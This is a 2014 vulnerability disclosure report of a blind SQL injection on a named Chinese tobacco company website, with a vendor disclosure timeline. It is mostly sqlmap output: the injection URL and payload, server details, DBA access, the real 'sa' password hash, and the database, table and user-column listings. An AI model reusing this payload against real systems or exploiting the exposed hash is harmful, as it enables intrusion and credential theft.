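2014-11-11: Details reported to the vendor; awaiting vendor action
2014-11-14: Vendor confirmed; details disclosed to the vendor only
2014-11-24: Details disclosed to core white hats and experts in related fields
2014-12-04: Details disclosed to regular white hats
2014-12-14: Details disclosed to intern white hats
2014-12-26: Details disclosed to the public
Sichuan Tobacco Industry SQL injection vulnerability
1. Injection point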
http://www.scti.cn/Cpzs.aspx?id=62 (GET)
2. Injection information
sqlmap identified the following injection points with a total of 568 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Generic boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: Generic boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (5434=5434) THEN 62 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current user is DBA: True
database management system users password hashes:
[*] sa [1]:
    password hash: 0x0100e91f3a04fdf44e6586452bfb91e24c7819156597b34a5bea80ef1526af4f7a2a5274a0d6581c3f0495fa8be7
        header: 0x0100
        salt: e91f3a04
        mixedcase: fdf44e6586452bfb91e24c7819156597b34a5bea
        uppercase: 80ef1526af4f7a2a5274a0d6581c3f0495fa8be7
available databases [11]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] ProductionManage
[*] ProductionPlanManage
[*] pubs
[*] scgy_cd
[*] scgyWW
[*] tempdb
[*] WebSite2014

current database: 'WebSite2014'

Database: WebSite2014
[39 tables]
+----------------------------+
| dtproperties               |
| sysconstraints             |
| syssegments                |
| v_dm_location              |
| v_getdate                  |
| v_xt_dept                  |
| v_xt_organise              |
| v_xt_t_user                |
| ww_attached_property_group |
| ww_attached_property_set   |
| ww_attached_property_value |
| ww_base_info               |
| ww_content                 |
| ww_content_adjunct         |
| ww_friend_website          |
| ww_invite_adjunct          |
| ww_invite_content          |
| ww_mod                     |
| ww_query_authority         |
| ww_visits_info             |
| xt_t_data_dict             |
| xt_t_error_log             |
| xt_t_function_mod          |
| xt_t_log                   |
| xt_t_log_info              |
| xt_t_log_set               |
| xt_t_mod_access            |
| xt_t_mod_access_detail     |
| xt_t_modulehelp            |
| xt_t_organise              |
| xt_t_param_enum_type_value |
| xt_t_parameter             |
| xt_t_parameter_disp_rows   |
| xt_t_parameter_type        |
| xt_t_role                  |
| xt_t_role_popedom          |
| xt_t_shortcut_function     |
| xt_t_user                  |
| xt_t_user_role             |
+----------------------------+

Database: WebSite2014
Table: xt_t_user
[11 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| keyid         | numeric  |
| note_date     | datetime |
| person_id     | numeric  |
| remark        | varchar  |
| sort_id       | int      |
| unitid        | varchar  |
| use_flag      | char     |
| user_account  | varchar  |
| user_name     | varchar  |
| user_password | varchar  |
| userid        | varchar  |
+---------------+----------+
Fix the injection point
Severity: Medium
Vulnerability Rank: 9
Confirmed: 2014-11-14 17:36
None yet